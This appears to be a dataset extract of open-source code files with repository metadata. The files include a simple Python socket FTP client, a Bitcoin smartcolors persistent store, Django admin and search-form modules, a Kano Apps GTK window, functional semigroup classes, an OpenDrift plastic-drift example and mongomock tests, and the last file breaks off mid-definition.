Dataset schema (per-row columns, with observed value ranges):

- repo_name: string (length 5 to 92)
- path: string (length 4 to 221)
- copies: string (19 classes)
- size: string (length 4 to 6)
- content: string (length 766 to 896k)
- license: string (15 classes)
- hash: int64 (-9,223,277,421,539,062,000 to 9,223,102,107B)
- line_mean: float64 (6.51 to 99.9)
- line_max: int64 (32 to 997)
- alpha_frac: float64 (0.25 to 0.96)
- autogenerated: bool (1 class)
- ratio: float64 (1.5 to 13.6)
- config_test: bool (2 classes)
- has_no_keywords: bool (2 classes)
- few_assignments: bool (1 class)

| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dvstter/SelfPythonSmallTools
|
ftp_server/client.py
|
1
|
1463
|
import socket
import struct
import math
class client:
def init_client(self, address, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.sock.connect((address.strip(), int(port)))
except socket.error, e:
print 'error:%s' % e
def main_loop(self):
while True:
cmd = raw_input('>')
if cmd == 'quit':
self.sock.send('quit')
self.sock.close()
break
elif cmd == 'list':
self.sock.send(cmd)
result = self.sock.recv(1024)
if result != '':
print result,
elif cmd[:5] == 'fetch':
self.sock.send(cmd)
self.get_file()
else:
                print 'command not recognised'
    def get_file(self):
        res = self.sock.recv(5)
        if res == 'error':
            print 'error occurred...'
            return
        num_info = self.sock.recv(8)
        # receive file size and file name size
        file_size, filename_size = struct.unpack('2i', num_info)
        # receive file name to create new file
        filename = self.sock.recv(filename_size)
        print 'fetching file, destination: %s' % filename
        # open file to write
        fid = open(filename, 'wb')
        # read the file in chunks of up to 1024 bytes
        for x in range(int(math.ceil(file_size/1024.0))):
            chunk = self.sock.recv(1024)
            fid.write(chunk)
        fid.close()
        print 'file transmitted over...'
if __name__ == '__main__':
c = client()
#address = raw_input('ftp server ip address:')
# port = raw_input('ftp server port number:')
address = 'localhost'
port = '8080'
c.init_client(address=address, port=port)
c.main_loop()
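# Illustrative sketch (hypothetical, not part of the original script): the
# wire format this client expects after sending 'fetch' is a 5-byte status,
# a struct-packed '2i' header (file size, filename size), the filename, and
# then the raw bytes in 1024-byte chunks. A matching server-side send could
# look roughly like this, for an already-accepted socket `conn`:
#
#   def send_file(conn, path):
#       data = open(path, 'rb').read()
#       conn.send('ok   ')  # 5-byte status; anything other than 'error'
#       conn.send(struct.pack('2i', len(data), len(path)))
#       conn.send(path)
#       for i in range(0, len(data), 1024):
#           conn.send(data[i:i + 1024])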
|
gpl-2.0
| -1,645,092,799,523,094,300
| 24.224138
| 63
| 0.640465
| false
| 2.902778
| false
| false
| false
|
proofchains/python-smartcolors
|
smartcolors/db.py
|
1
|
8363
|
# Copyright (C) 2014 Peter Todd <pete@petertodd.org>
#
# This file is part of python-smartcolors.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of python-smartcolors, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
import os
import tempfile
from bitcoin.core import b2x, b2lx, lx, x
import bitcoin.core
import bitcoin.core.script
import smartcolors.core.db
import smartcolors.io
class PersistentSet:
"""File-backed set"""
def __init__(self, *, root_dir_path):
self.root_dir_path = os.path.abspath(root_dir_path)
def _get_elem_filename(self, elem):
raise NotImplementedError
    def _serialize_elem(self, elem, fd):
raise NotImplementedError
def _deserialize_elem(self, fd):
raise NotImplementedError
def add(self, elem):
# No effect if element is already present
if elem in self:
return
elem_filename = self._get_elem_filename(elem)
os.makedirs(self.root_dir_path, exist_ok=True)
# Write the element to disk as a new temporary file in the directory
with tempfile.NamedTemporaryFile(dir=self.root_dir_path, prefix=elem_filename + '-tmp-') as fd:
self._serialize_elem(elem, fd)
fd.flush()
            # Hardlink the file to its correct name, which atomically makes it
# available to readers. The temporary name will be unlinked for us
# by NamedTemporaryFile.
try:
os.link(fd.name, os.path.join(self.root_dir_path, elem_filename))
except FileExistsError as exp:
# FIXME: actually handle this!
raise exp
def __iter__(self):
try:
elem_filenames = os.listdir(self.root_dir_path)
except FileNotFoundError as exp:
return
for elem_filename in elem_filenames:
with open(os.path.join(self.root_dir_path, elem_filename), 'rb') as fd:
yield self._deserialize_elem(fd)
def __contains__(self, elem):
elem_filename = self._get_elem_filename(elem)
return os.path.exists(os.path.join(self.root_dir_path, elem_filename))
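# A minimal concrete subclass, as an illustrative sketch (hypothetical, not
# part of the original module): only the three hooks above need defining.
# Here elements are byte strings stored under their hex-encoded names.
class _ExampleBytesSet(PersistentSet):
    def _get_elem_filename(self, elem):
        return elem.hex()
    def _serialize_elem(self, elem, fd):
        fd.write(elem)
    def _deserialize_elem(self, fd):
        return fd.read()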
class PersistentDict:
"""File-backed set"""
def __init__(self, *, root_dir_path):
self.root_dir_path = os.path.abspath(root_dir_path)
def _key_to_filename(self, key):
raise NotImplementedError
def _filename_to_key(self, filename):
raise NotImplementedError
def _get_item(self, key_abspath):
raise NotImplementedError
def _key_to_abspath(self, key):
return os.path.join(self.root_dir_path, self._key_to_filename(key))
def __contains__(self, key):
return os.path.exists(self._key_to_abspath(key))
def __getitem__(self, key):
key_abspath = self._key_to_abspath(key)
if not os.path.exists(key_abspath):
raise KeyError(key)
else:
return self._get_item(key_abspath)
def get(self, key, default_value=None):
try:
return self[key]
except KeyError:
return default_value
def __setitem__(self, key, value):
raise NotImplementedError
def setdefault(self, key, default_value=None):
try:
return self[key]
except KeyError:
pass
return default_value
def __iter__(self):
try:
key_filenames = os.listdir(self.root_dir_path)
except FileNotFoundError as exp:
return
for key_filename in key_filenames:
yield self._filename_to_key(key_filename)
def keys(self):
yield from self.__iter__()
def values(self):
yield from [self[key] for key in self.keys()]
def items(self):
for key in self:
yield (key, self[key])
class PersistentColorDefSet(PersistentSet):
def _get_elem_filename(self, colordef):
return b2x(colordef.hash) + '.scdef'
def _serialize_elem(self, colordef, fd):
smartcolors.io.ColorDefFileSerializer.stream_serialize(colordef, fd)
def _deserialize_elem(self, fd):
return smartcolors.io.ColorDefFileSerializer.stream_deserialize(fd)
class PersistentColorProofSet(PersistentSet):
def _get_elem_filename(self, colorproof):
return b2x(colorproof.hash) + '.scproof'
def _serialize_elem(self, colorproof, fd):
smartcolors.io.ColorProofFileSerializer.stream_serialize(colorproof, fd)
def _deserialize_elem(self, fd):
return smartcolors.io.ColorProofFileSerializer.stream_deserialize(fd)
class PersistentGenesisOutPointsDict(PersistentDict):
def _key_to_filename(self, outpoint):
return '%s:%d' % (b2lx(outpoint.hash), outpoint.n)
def _filename_to_key(self, filename):
hex_hash, str_n = filename.split(':')
return bitcoin.core.COutPoint(lx(hex_hash), int(str_n))
def _get_item(self, key_abspath):
return PersistentColorDefSet(root_dir_path=key_abspath)
def setdefault(self, key, default_value=None):
assert default_value == set()
default_value = PersistentColorDefSet(root_dir_path=self._key_to_abspath(key))
return super().setdefault(key, default_value=default_value)
class PersistentGenesisScriptPubKeysDict(PersistentDict):
def _key_to_filename(self, scriptPubKey):
if scriptPubKey:
return b2x(scriptPubKey)
else:
# gotta handle the empty case!
return '_'
def _filename_to_key(self, filename):
if filename == '_':
return bitcoin.core.script.CScript()
else:
return bitcoin.core.script.CScript(x(filename))
def _get_item(self, key_abspath):
return PersistentColorDefSet(root_dir_path=key_abspath)
def setdefault(self, key, default_value=None):
assert default_value == set()
default_value = PersistentColorDefSet(root_dir_path=self._key_to_abspath(key))
return super().setdefault(key, default_value=default_value)
class PersistentColorProofsByColorDefDict(PersistentDict):
def _key_to_filename(self, colordef):
return b2x(colordef.hash)
def _filename_to_key(self, filename):
# Bit of a hack to say the least...
colordef_filename = os.path.join(self.root_dir_path, '..', '..', 'colordefs', filename + '.scdef')
with open(colordef_filename, 'rb') as fd:
return smartcolors.io.ColorDefFileSerializer.stream_deserialize(fd)
def _get_item(self, key_abspath):
return PersistentColorProofSet(root_dir_path=key_abspath)
def setdefault(self, key, default_value=None):
assert default_value == set()
default_value = PersistentColorProofSet(root_dir_path=self._key_to_abspath(key))
return super().setdefault(key, default_value=default_value)
class PersistentColoredOutPointsDict(PersistentDict):
def _key_to_filename(self, outpoint):
return '%s:%d' % (b2lx(outpoint.hash), outpoint.n)
def _filename_to_key(self, filename):
hex_hash, str_n = filename.split(':')
return bitcoin.core.COutPoint(lx(hex_hash), int(str_n))
def _get_item(self, key_abspath):
return PersistentColorProofsByColorDefDict(root_dir_path=key_abspath)
def setdefault(self, key, default_value=None):
assert default_value == {}
default_value = PersistentColorProofsByColorDefDict(root_dir_path=self._key_to_abspath(key))
return super().setdefault(key, default_value=default_value)
class PersistentColorProofDb(smartcolors.core.db.ColorProofDb):
def __init__(self, root_dir_path):
self.root_dir_path = os.path.abspath(root_dir_path)
self.colordefs = PersistentColorDefSet(root_dir_path=os.path.join(self.root_dir_path, 'colordefs'))
self.genesis_outpoints = PersistentGenesisOutPointsDict(root_dir_path=os.path.join(self.root_dir_path, 'genesis_outpoints'))
self.genesis_scriptPubKeys = PersistentGenesisScriptPubKeysDict(root_dir_path=os.path.join(self.root_dir_path, 'genesis_scriptPubKeys'))
self.colored_outpoints = PersistentColoredOutPointsDict(root_dir_path=os.path.join(self.root_dir_path, 'colored_outpoints'))
|
gpl-3.0
| 4,823,416,512,252,157,000
| 32.8583
| 144
| 0.656343
| false
| 3.664768
| false
| false
| false
|
hetica/webeni
|
static/lib/cisco_clt.py
|
1
|
3492
|
#!/usr/bin/python
# *-* coding:utf-8 *-*
__appname__ = 'pytacad-clt'
__version__ = "0.1"
__author__ = "Benoit Guibert <benoit.guibert@free.fr>"
__licence__ = ""
import os, sys
import unicodedata
from django.utils.encoding import smart_unicode
server = os.path.dirname(sys.argv[0]) + '/pytacad-server'
cwd = '/var/local/pytacad/'
dirClasses = cwd + 'classes'
os.chdir(cwd)
def find_user(search_str=None):
""" Chercher un utilisateur """
f = open('liste_stagiaires')
    c = f.readlines() # c: file contents as a list of lines
nb = 0
list_stag = []
for a in c:
if unicodedata.normalize("NFKD", smart_unicode(search_str.lower(), 'utf-8')).encode('ascii', 'ignore') in unicodedata.normalize("NFKD", smart_unicode(a.lower(), 'utf-8')).encode('ascii', 'ignore'):
list_stag.append(a)
nb +=1
return (nb, list_stag)
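# Illustrative note (not part of the original file): the NFKD + ASCII-ignore
# normalisation above makes the substring match accent-insensitive, e.g.:
#
#   unicodedata.normalize("NFKD", smart_unicode('Hélène', 'utf-8')).encode('ascii', 'ignore')
#   # -> 'Helene', so searching 'helene' matches 'Hélène'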
def afficher_stags(stags):
""" mettre en forme l'affichage """
result = ""
for stag in stags:
s = stag.split(';')
result += 'Stagiaire : \t{0} {1} ({2})\n'.format(s[1], s[0], s[3])
for i,a in enumerate(stag.split(';')[5].split(',')):
if i == 0: result += 'Classes :\t' + a + '\n'
else : result += ('\t\t{0}\n'.format(a))
return result
def find_classe(search_str=None):
"""Chercher une ou des classes"""
l = os.listdir(dirClasses)
classes_found = ""
allclasses = ""
nb = 0
for i, a in enumerate(l):
# allclasses += a.split('.')[0].split('classe_')[1] + "\n"
allclasses += a.split('.')[0] + "\n"
if search_str.lower() in a.lower():
classe = a
# classes_found += a.split('.')[0].split('classe_')[1] + "\n"
classes_found += a.split('.')[0] + "\n"
nb += 1
if nb == 0:
        # if no class was found, list them all
mesg = "Aucune classe n'a été trouvée\n"
mesg += "Liste des classes de l'académie\n\n"
mesg += allclasses
return mesg
if nb == 1:
        # if exactly one class was found, list the trainees in it
fic = dirClasses + "/" + classe
f = open(fic, 'r')
mesg = f.read()
f.close()
return mesg
if nb > 1:
        # if several classes were found, list the matches
mesg = str(nb) + " classes trouvées\n"
mesg += "Affinez votre recherche\n\n"
mesg += classes_found
return mesg
"""
def infos():
os.system('clear')
print("\n INFOS GENERALES\n")
f = open('liste_stagiaires').readlines()
print(" Nombre de stagiaires : {0}".format(len(f)))
classes = os.listdir(dirClasses)
print(" Nombre de classes : {0}".format(len(classes)))
c = raw_input("\n Tapez sur une touche pour revenir au menu,\n ou 'c' pour afficher les noms des classes... ")
if c == "c":
os.system('clear')
for a in classes:
fclasse = open("./classes/" + a)
print(fclasse.readlines()[1].split(": ")[1].rstrip())
raw_input("\n Tapez sur une touche pour revenir au menu")
"""
"""
def maj_bd():
os.system('clear')
print("\n MISE A JOUR DE LA BASE DE DONNEES")
print(" ---------------------------------\n")
print(' La base de données est mise à jour 2 fois par jour, à 8H30 et 13H30.')
print(' Il est cependant possible de forcer une mise à jour ponctuelle en cas de besoin.')
print(" Celle-ci peut durer plusieurs minutes car il faut télécharger des pages Web sur Internet")
c = raw_input("\n Voulez-vous mettre la base de donnée à jour (taper 'y' pour accepter) ? ")
if c == "y":
print(" Merci de patienter...\n")
os.system(server)
print("\n La mise à jour est terminée")
raw_input("\n Tapez sur une touche pour revenir au menu... ")
"""
if __name__ == "__main__" :
menu()
|
lgpl-3.0
| 5,053,427,114,607,111,000
| 30.572727
| 199
| 0.624532
| false
| 2.498561
| false
| false
| false
|
KanoComputing/kano-apps
|
kano_apps/MainWindow.py
|
1
|
4372
|
# MainWindow.py
#
# Copyright (C) 2014-2018 Kano Computing Ltd.
# License: http://www.gnu.org/licenses/gpl-2.0.txt GNU GPLv2
#
# The MainWindow class
from gi import require_version
require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk
from kano_apps import Media
from kano_apps.UIElements import Contents
from kano_apps.AppGrid import Apps
from kano_apps.AppData import get_applications, refresh_package_list
from kano_apps.AppInstaller import AppInstaller
from kano.gtk3.top_bar import TopBar
from kano.gtk3.application_window import ApplicationWindow
from kano.gtk3.kano_dialog import KanoDialog
try:
from kano_profile.tracker import Tracker
kanotracker = Tracker()
except Exception:
    # tracking is optional; carry on without it if kano_profile is unavailable
    pass
class MainWindow(ApplicationWindow):
def __init__(self, install=None, icon_only=False, tutorial=False):
ApplicationWindow.__init__(self, 'Apps', 755, 588)
self._install = install
self._tutorial = tutorial
self._icon_only = icon_only
self._last_page = 0
self.connect("show", self._app_loaded)
# Destructor
self.connect('delete-event', Gtk.main_quit)
self.set_icon_from_file("/usr/share/kano-desktop/icons/apps.png")
# Styling
screen = Gdk.Screen.get_default()
specific_css_provider = Gtk.CssProvider()
specific_css_provider.load_from_path(Media.media_dir() +
'css/style.css')
specific_style_context = Gtk.StyleContext()
specific_style_context.add_provider_for_screen(
screen,
specific_css_provider,
Gtk.STYLE_PROVIDER_PRIORITY_USER
)
style = self.get_style_context()
style.add_class('main_window')
# Setup widgets
self.set_decorated(True)
self._top_bar = TopBar(_("Apps"), self._win_width, False)
self._top_bar.set_close_callback(Gtk.main_quit)
self.set_titlebar(self._top_bar)
self._contents = Contents(self)
self.set_main_widget(self._contents)
self.show_apps_view()
def get_main_area(self):
return self._contents
def get_last_page(self):
return self._last_page
def set_last_page(self, last_page_num):
self._last_page = last_page_num
def show_apps_view(self, button=None, event=None):
self._top_bar.disable_prev()
self._apps = apps = Apps(get_applications(), self)
self.get_main_area().set_contents(apps)
def refresh(self, category=None):
for app in get_applications():
if self._apps.has_app(app):
self._apps.update_app(app)
else:
self._apps.add_app(app)
def _app_loaded(self, widget):
if self._install is not None:
self._install_apps()
elif self._tutorial:
self._show_icon_tutorial()
def _show_icon_tutorial(self):
try:
from kano_profile.apps import save_app_state_variable, load_app_state_variable
if load_app_state_variable('kano-apps', 'icon-tutorial-shown'):
return
else:
save_app_state_variable('kano-apps', 'icon-tutorial-shown', True)
except ImportError:
# ignore problems importing kano_profile, as we don't want it to
# be a dependency
pass
kdialog = KanoDialog(
_("Add more apps to the desktop"),
_(
"Click the '+' button to the right of the app name to "
"make it appear on the desktop. You can remove it again "
"by clicking on 'x'."
),
{
_("OK, GOT IT"): {
"return_value": 0,
"color": "green"
}
},
parent_window=self
)
kdialog.set_action_background("grey")
kdialog.title.description.set_max_width_chars(40)
kdialog.run()
def _install_apps(self):
pw = None
for app in self._install:
inst = AppInstaller(app, self._apps, pw, self)
inst.set_check_if_installed(True)
inst.set_icon_only(self._icon_only)
inst.install()
pw = inst.get_sudo_pw()
self.set_last_page(0)
refresh_package_list()
self.refresh()
|
gpl-2.0
| -7,431,524,287,024,962,000
| 30.007092
| 90
| 0.583486
| false
| 3.772217
| false
| false
| false
|
przemyslawjanpietrzak/pyMonet
|
pymonet/semigroups.py
|
1
|
5042
|
class Semigroup:
"""
In mathematics, a semigroup is an algebraic structure
consisting of a set together with an associative binary operation.
A semigroup generalizes a monoid in that there might not exist an identity element.
    It also (originally) generalized a group (a monoid with all inverses)
    to a type where every element did not have to have an inverse, thus the name semigroup.
"""
def __init__(self, value):
self.value = value
def __eq__(self, other) -> bool:
return self.value == other.value
def fold(self, fn):
return fn(self.value)
@classmethod
def neutral(cls):
return cls(cls.neutral_element)
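# A minimal usage sketch (illustrative, not part of the original module):
# concat combines two wrapped values, fold unwraps with a function, and
# neutral() yields the identity element of the monoids defined below.
#
#   Sum(2).concat(Sum(3)).fold(lambda x: x)  # -> 5
#   All(True).concat(All(False)).value       # -> False
#   Sum.neutral().value                      # -> 0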
class Sum(Semigroup):
"""
Sum is a Monoid that will combine 2 numbers under addition.
"""
neutral_element = 0
def __str__(self) -> str: # pragma: no cover
return 'Sum[value={}]'.format(self.value)
def concat(self, semigroup: 'Sum') -> 'Sum':
"""
:param semigroup: other semigroup to concat
:type semigroup: Sum[B]
        :returns: new Sum with the sum of both semigroups' values
:rtype: Sum[A]
"""
return Sum(self.value + semigroup.value)
class All(Semigroup):
"""
All is a Monoid that will combine 2 values of any type using logical conjunction on their coerced Boolean values.
"""
neutral_element = True
def __str__(self) -> str: # pragma: no cover
return 'All[value={}]'.format(self.value)
def concat(self, semigroup: 'All') -> 'All':
"""
:param semigroup: other semigroup to concat
:type semigroup: All[B]
        :returns: new All with the last truthy value or the first falsy one
:rtype: All[A | B]
"""
return All(self.value and semigroup.value)
class One(Semigroup):
"""
One is a Monoid that will combine 2 values of any type using logical disjunction OR on their coerced Boolean values.
"""
neutral_element = False
def __str__(self) -> str: # pragma: no cover
return 'One[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: One[B]
        :returns: new One with the first truthy value or the last falsy one
:rtype: One[A | B]
"""
return One(self.value or semigroup.value)
class First(Semigroup):
"""
    First is a Monoid that will always return the first value when 2 First instances are combined.
"""
def __str__(self) -> str: # pragma: no cover
        return 'First[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: First[B]
:returns: new First with first value
:rtype: First[A]
"""
return First(self.value)
class Last(Semigroup):
"""
    Last is a Monoid that will always return the latest value when 2 Last instances are combined.
"""
def __str__(self) -> str: # pragma: no cover
return 'Last[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: Last[B]
:returns: new Last with last value
:rtype: Last[A]
"""
return Last(semigroup.value)
class Map(Semigroup):
"""
    Map is a Semigroup that concatenates, key by key, all the values inside the Map value.
"""
def __str__(self) -> str: # pragma: no cover
return 'Map[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: Map[B]
        :returns: new Map with all values concatenated
:rtype: Map[A]
"""
return Map(
{key: value.concat(semigroup.value[key]) for key, value in self.value.items()}
)
class Max(Semigroup):
"""
    Max is a Monoid that combines 2 numbers, resulting in the largest of the two.
"""
neutral_element = -float("inf")
def __str__(self) -> str: # pragma: no cover
return 'Max[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: Max[B]
:returns: new Max with largest value
:rtype: Max[A | B]
"""
return Max(self.value if self.value > semigroup.value else semigroup.value)
class Min(Semigroup):
"""
    Min is a Monoid that combines 2 numbers, resulting in the smallest of the two.
"""
neutral_element = float("inf")
def __str__(self) -> str: # pragma: no cover
return 'Min[value={}]'.format(self.value)
def concat(self, semigroup):
"""
:param semigroup: other semigroup to concat
:type semigroup: Min[B]
:returns: new Min with smallest value
:rtype: Min[A | B]
"""
return Min(self.value if self.value <= semigroup.value else semigroup.value)
|
mit
| -2,265,434,369,184,133,000
| 27.485876
| 120
| 0.601349
| false
| 3.701909
| false
| false
| false
|
celiao/django-rest-authemail
|
authemail/admin.py
|
1
|
3085
|
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import ugettext_lazy as _
from authemail.forms import EmailUserCreationForm, EmailUserChangeForm
from authemail.models import SignupCode, PasswordResetCode, EmailChangeCode
class SignupCodeAdmin(admin.ModelAdmin):
list_display = ('code', 'user', 'ipaddr', 'created_at')
ordering = ('-created_at',)
readonly_fields = ('user', 'code', 'ipaddr')
def has_add_permission(self, request):
return False
class SignupCodeInline(admin.TabularInline):
model = SignupCode
fieldsets = (
(None, {
'fields': ('code', 'ipaddr', 'created_at')
}),
)
readonly_fields = ('code', 'ipaddr', 'created_at')
def has_add_permission(self, request):
return False
class PasswordResetCodeAdmin(admin.ModelAdmin):
list_display = ('code', 'user', 'created_at')
ordering = ('-created_at',)
readonly_fields = ('user', 'code')
def has_add_permission(self, request):
return False
class PasswordResetCodeInline(admin.TabularInline):
model = PasswordResetCode
fieldsets = (
(None, {
'fields': ('code', 'created_at')
}),
)
readonly_fields = ('code', 'created_at')
def has_add_permission(self, request):
return False
class EmailChangeCodeAdmin(admin.ModelAdmin):
list_display = ('code', 'user', 'email', 'created_at')
ordering = ('-created_at',)
readonly_fields = ('user', 'code', 'email')
def has_add_permission(self, request):
return False
class EmailChangeCodeInline(admin.TabularInline):
model = EmailChangeCode
fieldsets = (
(None, {
'fields': ('code', 'email', 'created_at')
}),
)
readonly_fields = ('code', 'email', 'created_at')
def has_add_permission(self, request):
return False
class EmailUserAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Personal Info'), {'fields': ('first_name', 'last_name')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser',
'groups', 'user_permissions')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2'),
}),
)
form = EmailUserChangeForm
add_form = EmailUserCreationForm
inlines = [SignupCodeInline, EmailChangeCodeInline, PasswordResetCodeInline]
list_display = ('email', 'is_verified', 'first_name', 'last_name',
'is_staff')
search_fields = ('first_name', 'last_name', 'email')
ordering = ('email',)
admin.site.register(get_user_model(), EmailUserAdmin)
admin.site.register(SignupCode, SignupCodeAdmin)
admin.site.register(PasswordResetCode, PasswordResetCodeAdmin)
admin.site.register(EmailChangeCode, EmailChangeCodeAdmin)
|
gpl-3.0
| -7,126,561,763,274,769,000
| 29.245098
| 80
| 0.621718
| false
| 3.851436
| false
| false
| false
|
simodalla/django-caronte
|
setup.py
|
1
|
1497
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import caronte
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
version = caronte.__version__
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
print("You probably want to also tag the version now:")
print(" git tag -a %s -m 'version %s'" % (version, version))
print(" git push --tags")
sys.exit()
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
setup(
name='django-caronte',
version=version,
description="""Your project description goes here""",
long_description=readme + '\n\n' + history,
author='Simone Dalla',
author_email='simodalla@gmail.com',
url='https://github.com/simodalla/django-caronte',
packages=[
'caronte',
],
include_package_data=True,
install_requires=[
],
license="BSD",
zip_safe=False,
keywords='django-caronte',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
)
|
bsd-3-clause
| 5,328,639,089,583,490,000
| 26.218182
| 66
| 0.607882
| false
| 3.838462
| false
| true
| false
|
OpenDrift/opendrift
|
examples/example_plast.py
|
1
|
1520
|
#!/usr/bin/env python
"""
Plastic
==================================
"""
from datetime import timedelta
from opendrift.readers import reader_netCDF_CF_generic
from opendrift.models.plastdrift import PlastDrift
o = PlastDrift(loglevel=20)
o.list_configspec() # to see available configuration options
# Arome atmospheric model
reader_arome = reader_netCDF_CF_generic.Reader(o.test_data_folder() + '16Nov2015_NorKyst_z_surface/arome_subset_16Nov2015.nc')
# Norkyst ocean model
reader_norkyst = reader_netCDF_CF_generic.Reader(o.test_data_folder() + '16Nov2015_NorKyst_z_surface/norkyst800_subset_16Nov2015.nc')
o.add_reader([reader_norkyst, reader_arome])
start_time = reader_arome.start_time
#end_time = reader_arome.start_time + timedelta(hours=5)
end_time = reader_arome.end_time
time = [start_time, start_time + timedelta(hours=5)]
#%%
# Seeding some particles
lon = 4.6; lat = 60.0; # Outside Bergen
o.seed_elements(lon, lat, radius=50, number=3000, time=time)
o.run(end_time=end_time, time_step=1800, time_step_output=3600)
#%%
# Second run, without wind/Stokes drift
o2 = PlastDrift(loglevel=20)
o2.add_reader([reader_norkyst])
o2.seed_elements(lon, lat, radius=50, number=3000, time=time)
o2.run(end_time=end_time, time_step=1800, time_step_output=3600)
#%%
# Print and plot results
print(o)
o.animation(compare=o2, fast=True,
legend=['Current + wind/Stokes drift', 'Current only'])
#o.animation(color='depth')
#o.plot_property('depth')
#%%
# .. image:: /gallery/animations/example_plast_0.gif
|
gpl-2.0
| 396,845,777,678,186,000
| 30.666667
| 133
| 0.721711
| false
| 2.690265
| false
| true
| false
|
rh-marketingops/dwm
|
dwm/test/test_val_g_lookup.py
|
1
|
1702
|
""" test generic validation lookup function """
import mongomock
#from mock import patch
#from nose.tools import raises
from dwm import Dwm
# Setup mongomock db
DB = mongomock.MongoClient().db
DB.genericLookup.insert({"find": "BADVALUE"})
# Setup Dwm instance
FIELDS = {
'field1': {
'lookup': ['genericLookup'],
'derive': []
},
'field2': {
'lookup': ['genericLookup'],
'derive': []
}
}
DWM = Dwm(name='test', mongo=DB, fields=FIELDS)
# Let the testing begin
def test_dwm_vg_lup_bad():
""" Ensure generic lookup occurs """
rec = {'field1': 'BADVALUE'}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == {'field1': ''}
def test_dwm_vg_lup_good():
""" Ensure good value not cleared """
rec = {'field1': 'GOODVALUE'}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == rec
def test_dwm_vg_lup_badcln():
""" Ensure basic lookup occurs and cleans value before """
rec = {'field1': ' badvalue\r\n '}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == {'field1': ''}
def test_dwm_vg_lup_badmulti():
""" Ensure lookup occurs on every field in config """
rec = {'field1': 'BADVALUE', 'field2': 'BADVALUE'}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == {'field1': '', 'field2': ''}
def test_dwm_vg_lup_leave():
""" Ensure lookup does not occur on field not in config """
rec = {'field1': 'BADVALUE', 'field3': 'BADVALUE'}
rec_out, _ = DWM._val_g_lookup(rec, {}) #pylint: disable=W0212
assert rec_out == {'field1': '', 'field3': 'BADVALUE'}
|
gpl-3.0
| 8,576,870,995,289,725,000
| 25.184615
| 66
| 0.596357
| false
| 3.044723
| true
| false
| false
|
mikesname/ehri-collections
|
ehriportal/portal/forms.py
|
1
|
6151
|
"""Portal search forms."""
import string
from django import forms
from django.contrib.admin import widgets
from django.utils import translation
from django.utils.translation import ugettext_lazy as _
from django.forms.models import modelformset_factory, inlineformset_factory
from jsonfield.forms import JSONFormField
from haystack.forms import EmptySearchQuerySet
from portal import models, data, utils
class PortalSearchForm(forms.Form):
ENTITIES = [models.Repository, models.Collection, models.Authority]
SORTFIELDS = (
("", _("Relevance")),
("name", _("Title/Name")),
("publication_date", _("Publication Date")),
("django_ct", _("Type")),
)
q = forms.CharField(required=False, label=_('Search'))
sort = forms.ChoiceField(required=False, choices=SORTFIELDS, label=_("Order By"))
def filter(self, sqs):
"""Filter a search queryset."""
self.sqs = sqs
if self.cleaned_data["sort"]:
self.sqs = self.sqs.order_by(self.cleaned_data["sort"])
if not self.cleaned_data["q"]:
return self.no_query_found()
return sqs.auto_query(self.cleaned_data["q"])
def no_query_found(self):
return self.sqs
class PortalAllSearchForm(PortalSearchForm):
"""Form representing the whole collection."""
# def no_query_found(self):
# return EmptySearchQuerySet()
class LanguageSelectWidget(forms.SelectMultiple):
choices = utils.language_choices()
def __init__(self, *args, **kwargs):
super(LanguageSelectWidget, self).__init__(*args, **kwargs)
class ScriptSelectWidget(forms.SelectMultiple):
choices = utils.script_choices()
class MapSearchForm(PortalSearchForm):
type = forms.ChoiceField(label=_('Type'), choices=(("Repository", "Repository"),
("Collection", "Collection")))
ne = forms.CharField(required=False, label=_('North East'),
widget=forms.HiddenInput())
sw = forms.CharField(required=False, label=_('South West'),
widget=forms.HiddenInput())
def no_query_found(self):
"""Show no results for a map search."""
return EmptySearchQuerySet()
def filter(self, sqs):
"""Filter a search set with geo-bounds."""
model = getattr(models, self.cleaned_data["type"])
sqs = sqs.models(model)
return super(MapSearchForm, self).filter(sqs)
class FacetListSearchForm(PortalSearchForm):
"""Extension of the search form with another field for
the order in which facets are sorted. Since we can't do
this natively with Haystack, we have to hack it ourselves.
"""
sort = forms.ChoiceField(required=False,
choices=(("count",_("Count")), ("name", _("Name"))))
class LanguageSelectFormField(JSONFormField):
def __init__(self, *args, **kwargs):
super(LanguageSelectFormField, self).__init__(*args, **kwargs)
self.widget = forms.SelectMultiple(choices=utils.language_choices())
class ScriptSelectFormField(JSONFormField):
